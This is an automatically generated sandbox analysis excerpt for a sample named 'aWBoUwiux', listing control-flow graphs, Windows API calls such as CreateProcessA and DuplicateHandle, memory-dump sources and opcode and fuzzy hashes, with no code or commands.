                                      • Instruction Fuzzy Hash: 825147B4D002498FDB14DFAAD548B9EBBF1FF48304F20C459E419A7390D775A988CB65

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 407 6f33dfc-6f33e9d 410 6f33ed6-6f33ef6 407->410 411 6f33e9f-6f33ea9 407->411 418 6f33ef8-6f33f02 410->418 419 6f33f2f-6f33f5e 410->419 411->410 412 6f33eab-6f33ead 411->412 413 6f33ed0-6f33ed3 412->413 414 6f33eaf-6f33eb9 412->414 413->410 416 6f33ebb 414->416 417 6f33ebd-6f33ecc 414->417 416->417 417->417 420 6f33ece 417->420 418->419 421 6f33f04-6f33f06 418->421 425 6f33f60-6f33f6a 419->425 426 6f33f97-6f34051 CreateProcessA 419->426 420->413 423 6f33f29-6f33f2c 421->423 424 6f33f08-6f33f12 421->424 423->419 427 6f33f16-6f33f25 424->427 428 6f33f14 424->428 425->426 430 6f33f6c-6f33f6e 425->430 439 6f34053-6f34059 426->439 440 6f3405a-6f340e0 426->440 427->427 429 6f33f27 427->429 428->427 429->423 431 6f33f91-6f33f94 430->431 432 6f33f70-6f33f7a 430->432 431->426 434 6f33f7e-6f33f8d 432->434 435 6f33f7c 432->435 434->434 437 6f33f8f 434->437 435->434 437->431 439->440 450 6f340e2-6f340e6 440->450 451 6f340f0-6f340f4 440->451 450->451 452 6f340e8 450->452 453 6f340f6-6f340fa 451->453 454 6f34104-6f34108 451->454 452->451 453->454 455 6f340fc 453->455 456 6f3410a-6f3410e 454->456 457 6f34118-6f3411c 454->457 455->454 456->457 460 6f34110 456->460 458 6f3412e-6f34135 457->458 459 6f3411e-6f34124 457->459 461 6f34137-6f34146 458->461 462 6f3414c 458->462 459->458 460->457 461->462 464 6f3414d 462->464 464->464
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F3403E
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2508343454.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_6f30000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: a77b56c274347b58adcfd9267dc285136f02eb02042eadeadabcf958bdf23d1f
                                      • Instruction ID: c406bfb969e25b6397ad54ba139b78e4004922bfc6b1a93fdb49265dab6f2f5f
                                      • Opcode Fuzzy Hash: a77b56c274347b58adcfd9267dc285136f02eb02042eadeadabcf958bdf23d1f
                                      • Instruction Fuzzy Hash: A9A16D71D00669CFDB64DFA8C8417DEBBB2BF48310F148569E809A7244DB749985CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 465 6f33e08-6f33e9d 467 6f33ed6-6f33ef6 465->467 468 6f33e9f-6f33ea9 465->468 475 6f33ef8-6f33f02 467->475 476 6f33f2f-6f33f5e 467->476 468->467 469 6f33eab-6f33ead 468->469 470 6f33ed0-6f33ed3 469->470 471 6f33eaf-6f33eb9 469->471 470->467 473 6f33ebb 471->473 474 6f33ebd-6f33ecc 471->474 473->474 474->474 477 6f33ece 474->477 475->476 478 6f33f04-6f33f06 475->478 482 6f33f60-6f33f6a 476->482 483 6f33f97-6f34051 CreateProcessA 476->483 477->470 480 6f33f29-6f33f2c 478->480 481 6f33f08-6f33f12 478->481 480->476 484 6f33f16-6f33f25 481->484 485 6f33f14 481->485 482->483 487 6f33f6c-6f33f6e 482->487 496 6f34053-6f34059 483->496 497 6f3405a-6f340e0 483->497 484->484 486 6f33f27 484->486 485->484 486->480 488 6f33f91-6f33f94 487->488 489 6f33f70-6f33f7a 487->489 488->483 491 6f33f7e-6f33f8d 489->491 492 6f33f7c 489->492 491->491 494 6f33f8f 491->494 492->491 494->488 496->497 507 6f340e2-6f340e6 497->507 508 6f340f0-6f340f4 497->508 507->508 509 6f340e8 507->509 510 6f340f6-6f340fa 508->510 511 6f34104-6f34108 508->511 509->508 510->511 512 6f340fc 510->512 513 6f3410a-6f3410e 511->513 514 6f34118-6f3411c 511->514 512->511 513->514 517 6f34110 513->517 515 6f3412e-6f34135 514->515 516 6f3411e-6f34124 514->516 518 6f34137-6f34146 515->518 519 6f3414c 515->519 516->515 517->514 518->519 521 6f3414d 519->521 521->521
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F3403E
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2508343454.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_6f30000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: e12e07cf3aa7749acebd74708cf2c771cbc6b5b0b526c7a03b14f92e803634f0
                                      • Instruction ID: 1c697148e78858cdd1135d05ffd8c0cccffe718e7fadc4383ca2ea34592aba9c
                                      • Opcode Fuzzy Hash: e12e07cf3aa7749acebd74708cf2c771cbc6b5b0b526c7a03b14f92e803634f0
                                      • Instruction Fuzzy Hash: DB916C71D00669CFDB64DFA8C8817DEBBB2BF48310F1485A9E809A7244DB749985CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 522 28db478-28db497 523 28db499-28db4a6 call 28d9ef8 522->523 524 28db4c3-28db4c7 522->524 531 28db4bc 523->531 532 28db4a8 523->532 525 28db4c9-28db4d3 524->525 526 28db4db-28db51c 524->526 525->526 533 28db51e-28db526 526->533 534 28db529-28db537 526->534 531->524 579 28db4ae call 28db710 532->579 580 28db4ae call 28db720 532->580 533->534 536 28db539-28db53e 534->536 537 28db55b-28db55d 534->537 535 28db4b4-28db4b6 535->531 538 28db5f8-28db676 535->538 540 28db549 536->540 541 28db540-28db547 call 28db140 536->541 539 28db560-28db567 537->539 572 28db67c-28db6b8 538->572 573 28db678-28db67b 538->573 543 28db569-28db571 539->543 544 28db574-28db57b 539->544 542 28db54b-28db559 540->542 541->542 542->539 543->544 546 28db57d-28db585 544->546 547 28db588-28db591 call 28db150 544->547 546->547 553 28db59e-28db5a3 547->553 554 28db593-28db59b 547->554 555 28db5a5-28db5ac 553->555 556 28db5c1-28db5ce 553->556 554->553 555->556 558 28db5ae-28db5be call 28db160 call 28db170 555->558 562 28db5f1-28db5f7 556->562 563 28db5d0-28db5ee 556->563 558->556 563->562 574 28db6ba-28db6bd 572->574 575 28db6c0-28db6eb GetModuleHandleW 572->575 573->572 574->575 576 28db6ed-28db6f3 575->576 577 28db6f4-28db708 575->577 576->577 579->535 580->535
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 028DB6DE
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: b2109b091bc333ce701e9369d092776fc65c3080b2c08baa39dba5264a1d7a8b
                                      • Instruction ID: 38685d32f4b1810af292f40fd0de126c34f0598dcaf792851fd2da25cd983d21
                                      • Opcode Fuzzy Hash: b2109b091bc333ce701e9369d092776fc65c3080b2c08baa39dba5264a1d7a8b
                                      • Instruction Fuzzy Hash: 298169B8A00B498FD724DF2AD05475ABBF2FF88308F11892DD48AD7A50D774E949CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 689 28d590c-28d5916 690 28d591c-28d59d9 CreateActCtxA 689->690 691 28d5918-28d591b 689->691 693 28d59db-28d59e1 690->693 694 28d59e2-28d5a3c 690->694 691->690 693->694 701 28d5a3e-28d5a41 694->701 702 28d5a4b-28d5a4f 694->702 701->702 703 28d5a51-28d5a5d 702->703 704 28d5a60-28d5a90 702->704 703->704 708 28d5a42 704->708 709 28d5a92-28d5a97 704->709 710 28d5a44 708->710 711 28d5ab1-28d5ab3 708->711 712 28d5b09-28d5b14 709->712 713 28d5a4a 710->713 714 28d5a46 710->714 711->712 713->702 715 28d59cf-28d59d9 713->715 714->713 715->693 715->694
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 028D59C9
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 91136f00c4d74664d53c6c1b5b06e5c975f4acfc589bca2957a888cf6256b6b6
                                      • Instruction ID: 6628431d6b077cb38306cd687ff08b445658a73c7dfe501a2ab1c6d2047de93b
                                      • Opcode Fuzzy Hash: 91136f00c4d74664d53c6c1b5b06e5c975f4acfc589bca2957a888cf6256b6b6
                                      • Instruction Fuzzy Hash: EA41C3B4C0071DCBDB24DFA9C884BCEBBB5BF49304F60805AD408AB255DB756949CF91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 716 28d44b4-28d59d9 CreateActCtxA 720 28d59db-28d59e1 716->720 721 28d59e2-28d5a3c 716->721 720->721 728 28d5a3e-28d5a41 721->728 729 28d5a4b-28d5a4f 721->729 728->729 730 28d5a51-28d5a5d 729->730 731 28d5a60-28d5a90 729->731 730->731 735 28d5a42 731->735 736 28d5a92-28d5a97 731->736 737 28d5a44 735->737 738 28d5ab1-28d5ab3 735->738 739 28d5b09-28d5b14 736->739 740 28d5a4a 737->740 741 28d5a46 737->741 738->739 740->729 742 28d59cf-28d59d9 740->742 741->740 742->720 742->721
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 028D59C9
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 7533f9f6d0232c2e1cde426c76d9fbf8516f12c536e16fd56a3cd1d0bcfd8a56
                                      • Instruction ID: 3bffddf0d8623dc306c0529950c77f2cbbe3d71bbb9411ae89fbba53bac1525d
                                      • Opcode Fuzzy Hash: 7533f9f6d0232c2e1cde426c76d9fbf8516f12c536e16fd56a3cd1d0bcfd8a56
                                      • Instruction Fuzzy Hash: 9341E2B4C0071DCBDB24DFA9C884BDDBBB5BF49304F60806AD408AB255DBB56989CF91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 743 28dd968-28dd9fc DuplicateHandle 744 28dd9fe-28dda04 743->744 745 28dda05-28dda22 743->745 744->745
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028DD9EF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 1c3f27b4038e900736b8068c93eb85ed08825eca574dc895505ffbf07f5fbffb
                                      • Instruction ID: 0569f2d55b968001e97ed21b6a0e7273c8ae64382293ed136ada2d4fe575cef3
                                      • Opcode Fuzzy Hash: 1c3f27b4038e900736b8068c93eb85ed08825eca574dc895505ffbf07f5fbffb
                                      • Instruction Fuzzy Hash: D921E2B5D00249AFDB10CFAAD984ADEBBF8FB48310F14801AE918A3310D374A954CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 748 28db678-28db6b8 750 28db6ba-28db6bd 748->750 751 28db6c0-28db6eb GetModuleHandleW 748->751 750->751 752 28db6ed-28db6f3 751->752 753 28db6f4-28db708 751->753 752->753
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 028DB6DE
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 19cb1b5abf27211c360658ec763713f72a1350690d05498246b7774577d0b8c4
                                      • Instruction ID: eba2e6db93ddaf55ada66a47c61b1ca4d5822bd8e0e997eacc2d4eca4bc1ae85
                                      • Opcode Fuzzy Hash: 19cb1b5abf27211c360658ec763713f72a1350690d05498246b7774577d0b8c4
                                      • Instruction Fuzzy Hash: 331110B9C002498FCB10CF9AD444BDEFBF4EF88314F11842AD429A7210C375A549CFA1
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac2bccc0709eb7ecf6150f1d5125e7ed42bc7ce3bc78000aa80c71fbaa4e548d
                                      • Instruction ID: 1e5482d5d358fef12658db2d37dab34dd03b2f2fb5b597806a4ef02d8ebf03a1
                                      • Opcode Fuzzy Hash: ac2bccc0709eb7ecf6150f1d5125e7ed42bc7ce3bc78000aa80c71fbaa4e548d
                                      • Instruction Fuzzy Hash: 372148B1508288DFDB01DF04DDC0B16BFA5FBA4324F24C569E8095B286C336E816C6A2
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31ad2288f5a85c2327e85754d491782b9530a0ca32696561050fe99560042733
                                      • Instruction ID: 1a1bb907352e6463d3d4d940fb7641a4a115e18b3205e6612040b4539ea73810
                                      • Opcode Fuzzy Hash: 31ad2288f5a85c2327e85754d491782b9530a0ca32696561050fe99560042733
                                      • Instruction Fuzzy Hash: 0921F571608248DFDB15DF14D9C4B26BF67EB84318F34C56DDA0A5B286CB36D807CA61
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a2d5955f15c1281bd931c5527189ce42df5a97bf22f3e1d38c36c98ac251dd9a
                                      • Instruction ID: 8b4720502dc8d329ffc3f1b38e67fa9de5f09bc9d2fa1ab34c5c5e74572146f9
                                      • Opcode Fuzzy Hash: a2d5955f15c1281bd931c5527189ce42df5a97bf22f3e1d38c36c98ac251dd9a
                                      • Instruction Fuzzy Hash: C32107B1508208EFEB05DF54D9C0B36BFA6FB84318F34C56DDA095B265C336D816CAA1
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9684c13a045828098d57016339ba91ac0b41d3b69b94d00840714903c0794644
                                      • Instruction ID: 9219bcfc13b5de86a9864f2cea992b57c100747cbad30d6c04eb5b4de9586119
                                      • Opcode Fuzzy Hash: 9684c13a045828098d57016339ba91ac0b41d3b69b94d00840714903c0794644
                                      • Instruction Fuzzy Hash: C721807550D3848FDB02CF24D994715BF72EB46314F28C5EAD9498B6A7C33A980ACB62
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                      • Instruction ID: 734fedb63789cff96bcb30af2bbe655d5b7caa8c9c0d21dad79cda216046ff66
                                      • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                      • Instruction Fuzzy Hash: 65112676404284CFCB12CF00D9C4B16BF71FBA4324F24C2A9D8090B656C33AE85ACBA1
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                      • Instruction ID: 6252b60aa5ee5487738412d88ab598e940bdd188d196644265f5f7e4dbd3be67
                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                      • Instruction Fuzzy Hash: 8F11BE75508244DFDB02CF50D9C4B25BF62FB84318F24C6AAD9494B666C33AD81ACB91
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b3bc5e34248b33baea97004f30af2a318e784254f06c66208452cb45640e176
                                      • Instruction ID: 6673e8735f7133f3e40a3b4ba732ee9f25387ec1f0f9cb4e009e5ca6494d0e40
                                      • Opcode Fuzzy Hash: 7b3bc5e34248b33baea97004f30af2a318e784254f06c66208452cb45640e176
                                      • Instruction Fuzzy Hash: 6C012B7100C3889AE7104F26CDC4B67BF98DF41324F28C51BFD091A286D3399840CA71
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 32c1d2be0b552a8093d372898d74f2307c0f655b58d87836b300660df5021219
                                      • Instruction ID: ab21f031ed8c070a731619c9ca0e1714f0630063145e35d1f36ab5725c1bc724
                                      • Opcode Fuzzy Hash: 32c1d2be0b552a8093d372898d74f2307c0f655b58d87836b300660df5021219
                                      • Instruction Fuzzy Hash: C2F062714083849EE7108F16DD88B62FF98EB51734F18C55BFD485A296C3799844CAB1